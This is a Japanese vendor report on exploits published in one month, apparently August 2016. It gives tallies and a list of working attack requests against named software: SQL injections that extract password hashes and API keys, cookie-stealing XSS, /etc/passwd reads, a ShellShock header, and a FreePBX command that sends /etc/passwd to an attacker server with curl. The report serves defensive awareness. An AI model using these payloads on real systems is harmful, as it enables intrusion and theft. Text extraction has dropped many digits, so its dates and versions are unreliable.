06.08
サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site Scripting らの攻撃は単にスクリプトを使用したり イメージタグを使用するなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした しかし Cross Site Scripting の攻撃は スクリプトおよび特定タグが実行されると 脆弱な部分に実際の多様なコードが挿入ができる攻撃なので スクリプトおよびタグなどの実行自体ができないようにしなければなりません したがって 脆弱性が発見された該当ソフトウェアを使用する管理者はそのスクリプトおよびイメージタグが実行されるかを確認した後 必ずセキュアコーディングおよびアップデートが必要と考えられます Cross Site Scripting 以外の脆弱性では Linux Bash の脆弱性としてよく知られている ShellShock の脆弱性が発見されました 攻撃パターンは 主に HTTP Header に入り CGI が実行される際 任意の命令語が実行されることができます 04 年に初めて発見された ShellShock の脆弱性は OpenSSL の脆弱性である HeartBleed 脆弱性よりもっと波及力が大きな脆弱性でしたが 現在は Bash Update を最新に実施して 解決することができます 古いバージョンの Linux を使用している管理者であればこのようなセキュリティアップデートを実施し ShellShock と同じ脆弱性に露出されて 規模の大きいセキュリティ事故とつながらないように注意しなければなりません. 脆弱性別件数 脆弱性カテゴリ 件数 ファイルアップロード (File Upload) リモートコマンド実行 (Remote Command Execution) ディレクトリトラバーサル (Directory Traversal) ローカルファイル挿入 (Local File Inclusion:LFI) 4 コマンドインジェクション (Command Injection) 5 SQL インジェクション (SQL Injection) 0 クロスサイトスクリプティング (Cross Site Scripting : XSS) 合計 36 4 0 8 6 4 0 File Upload Remote Command Execution 脆弱性別件数 Directory Traversal 4 LFI 5 Command Injection 0 SQL Injection XSS. 危険度別件数 危険度 件数 割合 早急対応要 3 8% 高 33 9% 合計 36 00% 危険度別件数 3 早急対応要 高 33 3. 攻撃実行の難易度別件数難易度 件数 割合 難 3 6% 中 4% 易 3 65% 合計 49 00% 攻撃実行の難易度別件数 3 難 中 3 易 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 件数 7 5 5 Sakai 4 Nagios Incident Manager NUUO NVRmini FreePBX Navis WebAccess Nagios Log Server PHP Power Browse chatnow phpcollab CMS Davolink Subrion CMS Zabbix WebNMS Framework Server 合計 36 主なソフトウェア別脆弱性発生件数 7 5 5 4 Sakai Nagios Incident Manager NUUO NVRmini FreePBX Navis WebAccess Nagios Log Server PHP Power Browse chatnow phpcollab CMS Davolink
06-08-0 4090 XSS 中高 WordPress WP Live Chat Support Plugin 6..03 - adminajax.php XSS 脆弱性 POST /wp-admin/admin-ajax.php HTTP/. action=wplc_user_send_offline_message&security=8df c9e30&cid=&name=<script>eval(string.fromcharcod e(97, 08, 0, 4, 6, 40, 34, 88, 83, 83, 3, 05, 0, 3, 0, 97, 09, 0, 33, 34, 4, 59));</script>&email=Mail&msg=<script>eval(String.fro mcharcode(97, 08, 0, 4, 6, 40, 34, 88, 83, 83, 3, 05, 0, 3, 09, 5, 03, 33, 34, 4, 59));</script> WordPress WP Live Chat Support Plugin 6..03 06-08-0 4089 SQL Injection 難早急対応要 WordPress Booking Calendar Plugin 6. - SQL Injection POST /wp-admin/admin.php?page=booking%fwpdevbooking.phpwpdevbooking&wh_approved&wh_is_new=&wh_booking_d ate=3&view_mode=vm_listing HTTP/. WordPress Booking Calendar Plugin 6. wh_booking_id=3 AND (SELECT 583 FROM(SELECT COUNT(*),CONCAT(0x776667,(SELECT MID((IFNULL(CAST(user_pass AS CHAR),0x0)),,54) FROM wordpress.wp_users ORDER BY ID LIMIT 0,),0x77a787a7,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 06-08-05 4006 XSS 中高 WordPress Count per Day Plugin 3.5.4 - / XSS 脆弱性 GET / HTTP/. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/5.0.704.03 Safari/537.36 Referer: javascript:c=string.fromcharcode;alert(c(83)+c(7)+c( 09)+c(79)+c(0)+c(80)+c(9)+c(0)+c(46)+c(0) +c(08)) WordPress Count per Day Plugin 3.5.4 /scvrtsrv.cmd?action=add&srvname=foobar<iframe% 06-08-05 4005 XSS 易 高 Davolink DV-05 - / XSS 脆弱性 0onload=alert(0)>&srvAddr=9.68..00&proto=,& estart=4444,&eend=4444,istart=4444,&iend=4444, Davolink Davolink DV- 05 06-08-05 4004 LFI 易高 PHP Power Browse. - browse.php LFI 脆弱性 /browse.php?p=source&file=/etc/passwd PHP Power Browse PHP Power Browse. 06-08-05 400 SQL Injection 易高 Subrion CMS 4.0.5 - /admin/database/sql/ SQL POST /admin/database/sql/ HTTP/. Subrion CMS Subrion CMS 4.0.5 query= and =--&show_query= or =-- &exec_query=go Copyright 06 Penta Security Systems Inc. All rights reserved
06-08-06 403 Remote Command Execution 難 早急対応要 NUUO NVRmini 3.0.8 - /cgibin/cgi_system RCE 脆弱性 POST / HTTP/. User-Agent: () { :;}; /bin/ls -al NUUO NVRmini NUUO NVRmini 3.0.8 cmd=ftp_setup&act=modify&com_port=&pasv_port_fr om=04&pasv_port_to=65535&services=enable 06-08-06 40 Command Injection 易高 NUUO NVRmini 3.0.8 - /cgibin/cgi_system Command POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/. NUUO NVRmini NUUO NVRmini 3.0.8 bfolder=%fmtd%fblock3&bfile= ping%0- n%00%0localhost&inc_emap=no&inc_pos=no 06-08-08 408 SQL Injection 易高 phpcollab CMS.5 - /phpcollab/users/emailusers.php?id=%0or%0=-- emailusers.php SQL Injection 脆 &&PHPSESSID=ghtu76jt76nji04lua07930t5 弱性 phpcollab CMS phpcollab CMS.5 06-08-08 406 SQL Injection 易高 /express/shownotice.do?report_type=&gkey= AND 9753=(SELECT Navis WebAccess - UPPER(XMLType(CHR(60) CHR(58) CHR(3) CHR(0 shownotice.do SQL Injection 脆 6) CHR(8) CHR(98) CHR(3) (SELECT (CASE Navis WebAccess 弱性 WHEN (9753=9753) THEN ELSE 0 END) FROM DUAL) CHR(3) CHR(07) CHR(07) CHR(8) CHR( 3) CHR(6))) FROM DUAL) Navis WebAcces 06-08-0 409 Directory Traversal 易高 POST /servlets/fileuploadservlet?filename=../jsp/login.jsp HTTP/. WebNMS Framework Server 5. and 5. SP - /servlets/ Directory Traversal 脆弱性 WebNMS Framework Server WebNMS Framework Server 5. and 5. SP 06-08-5 4037 SQL Injection 易高 Zabbix..x, 3.0.x - latest.php SQL /latest.php?output=ajax&sid=&favobj=toggle&toggle_o pen_state=&toggle_ids[]=5385)%3b%0select%0 *%0from%0users%0where%0(%3D Zabbix Zabbix..x, 3.0.x 06-08-6 404 XSS 易高 - challenges-mgt.jsp XSS 脆弱性 /carbon/identity-mgt/challengesmgt.jsp?addrowid=xss&setname="/><script>alert(docu ment.cookie)</script> Copyright 06 Penta Security Systems Inc. All rights reserved
06-08-6 4040 LFI 易高 - downloadgz-ajaxprocessor.jsp LFI 脆弱性 /carbon/log-view/downloadgzajaxprocessor.jsp?logfile=../../repository/conf/registry.x ml&tenantdomain=&servicename= 06-08-6 405 Command Injection 中高 /nagiosim/reports/download/jpg/mttr/c3rhcnrfzgf0zt0 Nagios Incident Manager.0.0 - ymdeltaltajmvuzf9kyxrlptiwmtytmdutmdymdhl /nagiosim/reports/download/ wzxnbxt0yiiiio3t0b3vjacwvdgwl0zrklmrx07zwnob Command w== Nagios Incident Manager Nagios Incident Manager.0.0 06-08-6 405 SQL Injection 中高 /nagiosna/index.php/api/checks/read?q%5blastcode%5..0 - D=0&o%5Bcol%5D=name%0AND%0(SELECT%0* /nagiosna/index.php/api/checks %0FROM%0(SELECT(SLEEP(5)))UtTW)&o%5Bsort% / SQL 5D=ASC..0 POST /nagioslogserver/api/check/create/ HTTP/. 06-08-6 4050 Command Injection 中高 Nagios Log Server.4. - Multiple Vulnerabilities alert={"name"%3a"stduseralerttest","check_interval"%3a" m","lookback_period"%3a"m","warning"%3a"","critical" %3a"","method"%3a{"type"%3a"exec","path"%3a"/bin/to uch", "args"%3a"/tmp/stduser"},"alert_crit_only"%3a0,"created _by"%3a"stduser","query_id"%3a"avtlgmd- GYGKrkWMo5Tc"} Nagios Log Server Nagios Log Server.4. 06-08-6 405 SQL Injection 難早急対応要 Nagios Incident Manager.0.0 - /nagiosim/admin/settings SQL POST /nagiosim/admin/settings HTTP/. timezone=pacific/samoa' AND (SELECT 533 FROM(SELECT COUNT(*),CONCAT(0x77a7a77,(MID((IFNULL(CAST (DATABASE() AS CHAR),0x0)),,54)),0x770786a7,FLOOR(RAND(0)* ))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ' Nagios Incident Manager Nagios Incident Manager.0.0 06-08-6 405 SQL Injection 中高..0 - /nagiosna/index.php/api/sources/read?o%5bcol%5d=n /nagiosna/index.php/api/source ame%0and%0(select%0*%0from%0(selec s/ SQL # T(SLEEP(5)))UtTW)&o%5Bsort%5D=ASC..0 Copyright 06 Penta Security Systems Inc. All rights reserved
06-08-6 405 SQL Injection 中高..0 - /nagiosna/index.php/admin/ SQL # POST /nagiosna/index.php/admin/globals HTTP/. timezone=us/eastern%' AND (SELECT 4646 FROM(SELECT COUNT(*),CONCAT(0x333,(SELECT MID((IFNULL(CAST(apikey AS CHAR),0x0)),,54) FROM nagiosna_users WHERE id= LIMIT 0,),0x333,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=''..0 06-08-6 405 Command Injection 中高..0 - /nagiosna/index.php/download/report/sourcegroup/test/ /nagiosna/index.php/download/r cvtyawrdptumcvtnawrdpteiiciio3t0b3vjacwvdgwlr eport/sourcegroup/ Command FURGSUxFfTtlYhvICI=..0 06-08-6 405 Command Injection 中高..0 - /nagiosna/index.php/download/report/source/test/cvtya /nagiosna/index.php/download/r WRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdGwLRFUR eport/source/ Command GSUxFfTtlYhvICI=..0 06-08-6 404 XSS 易高 /carbon/identity-mgt/challenges-mgtfinish.jsp?setname=%%f%3e%3cscript%3ealert %8document.cookie%9%3C%Fscript%3E&questio n0=&question=city+where+you+were+born+%3f&set Id=http%3A%F%Fwso.org%Fclaims%Fchallen gequestion&question=city+where+you+were+born+ %3F&question=Father%7s+middle+name+%3F&setI d=http%3a%f%fwso.org%fclaims%fchalleng equestion&question=father%7s+middle+name+% 3F&question3=Name+of+your+first+pet+%3F&setId3= http%3a%f%fwso.org%fclaims%fchallengequ estion&question3=name+of+your+first+pet+%3f&qu estion4=favorite+sport+%3f&setid4=http%3a%f% - Fwso.org%Fclaims%FchallengeQuestion&question challenges-mgt-finish.jsp XSS 脆 4=Favorite+sport+%3F&question5=Favorite+food+%3F 弱性 # &setid5=http%3a%f%fwso.org%fclaims%fcha llengequestion&question5=favorite+food+%3f&quest ion6=favorite+vacation+location+%3f&setid6=http%3 A%F%Fwso.org%Fclaims%FchallengeQuestion &question6=favorite+vacation+location+%3f&question 7=Model+of+your+first+car+%3F&setId7=http%3A% F%Fwso.org%Fclaims%FchallengeQuestion&que stion7=model+of+your+first+car+%3f&question8=na me+of+the+hospital+where+you+were+born+%3f&set Id8=http%3A%F%Fwso.org%Fclaims%Fchallen gequestion&question8=name+of+the+hospital+wher e+you+were+born+%3f&setid9=%%f%3e%3cscr ipt%3ealert%8document.cookie%9%3c%fscript %3E&question9=XSS 06-08-6 404 XSS 易高 - webapp_info.jsp XSS 脆弱性 /carbon/webapplist/webapp_info.jsp?webappfilename=odata.war&web appstate=all&hostname=victimserver&httpport=9763&defaulthostname=victimserver&webapptype=%/%3e%3cscript%3ealert% 8%7XSS%0hyp3rlinx%0\\n\\n%7%0%bd ocument.cookie%9%3c/script%3e /carbon/ndatasource/newdatasource.jsp?dsname=%o 06-08-6 404 XSS 易高 - newdatasource.jsp XSS 脆弱性 nmousemove=%alert%8%7xss%0by%0hyp3rlinx% 0\\n\\n%7%bdocument.cookie%9&edit=HELL Copyright 06 Penta Security Systems Inc. All rights reserved
06-08-6 404 XSS 易高 - validateconnectionajaxprocessor.jsp 脆弱性 /carbon/ndatasource/validateconnectionajaxprocessor.jsp?&dsname=wso_carbon_db&drive r=com.mysql.jdbc.driver&url=%/%3e%3cscript%3e alert%8666%9%3c/script%3e&username=root&dst ype=rdbms&customdstype=rdbms&dsprovidertype= default&dsclassname=undefined&dsclassname=undefin ed&dsproviderproperties=undefined&editmode=false&c hangepassword=true&newpassword= 06-08-6 404 XSS 易高 - handlers.jsp XSS 脆弱性 /carbon/viewflows/handlers.jsp?retainlastbc=true&flow =in&phase=%/%3e%3cscript%3ealert%8docume nt.cookie%9%3c/script%3e 06-08- 4088 Directory Traversal 易高 POST /wp-admin/admin-ajax.php HTTP/. WordPress 4.5.3 - adminajax.php Directory Traversal 脆弱 性 WordPress 4.5.3 plugin=../../../../../../../../../../dev/random&action=updateplugin 06-08- 4086 File Upload 中高 Sakai 0.7 - / File Upload 脆弱性 POST /sakai-fckconnector/web/editor/filemanager/browser/default/con nectors/jsp/connector/user/admin/?command=fileuplo ad&type=jsp¤tfolder=%fgroup%fportfolioa dmin%f HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=----------- ----------------7dd009908f Sakai Sakai 0.7 -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="test.jsp'-alert()-'foo" Content-Type: application/octet-stream test -----------------------------7dd009908f-- 06-08- 4086 XSS 易高 Sakai 0.7 - /portal/tool/~admin-00/ XSS 脆弱性 /portal/tool/~admin- 00/create_job?_id:job_name=TEST';alert()//&_id%3A _id0=data+warehouse+update&_id:_id4=post&com. sun.faces.view=&_id=_id Sakai Sakai 0.7 06-08- 4086 XSS 易高 Sakai 0.7 - /access/basiclti/site/~admin/axxm4j<img src=a /access/basiclti/site/~admin/ XSS onerror=alert(3)> 脆弱性 Sakai Sakai 0.7 Copyright 06 Penta Security Systems Inc. All rights reserved
06-08- 4086 LFI 易高 Sakai 0.7 - /portal/tool/ LFI 脆弱性 /portal/tool/4fec34b-a47c-4aa5-8786- 3873533f44fa/CvnkzU-3z-QPe7ZiQOA/../WEB- INF/web.xml Sakai Sakai 0.7 06-08-3 4093 XSS 易高 chatnow - login.php XSS 脆弱性 POST /chatnow/login.php/95fb4"><script>alert(45)</script>b 5ca HTTP/. chatnow chatnow 06-08-3 4090 LFI 易高 WordPress Mail Masta Plugin.0 - count_of_send.php LFI 脆弱性 /wp-content/plugins/mailmasta/inc/campaign/count_of_send.php?pl=/etc/passw d WordPress Mail Masta Plugin. 06-08-9 4096 Remote Command Execution 中 高 FreePBX 3.0.35 - config.php RCE 脆弱性 /admin/config.php?display=modules&action=upload&d ownload=0x448&remotemod=http://7.0.0./junk% 6x=$(cat /etc/passwd);curl -d "$x" http://attacker_server:8080/0x448.jnk FreePBX FreePBX 3.0.35 06-08-9 403 SQL Injection 中高 FreePBX 3.0.35 - config.php SQL /admin/config.php?display=f4ris"xor(if(666=666,sle ep(0.03),0))or"*/ FreePBX FreePBX 3.0.35 Copyright 06 Penta Security Systems Inc. All rights reserved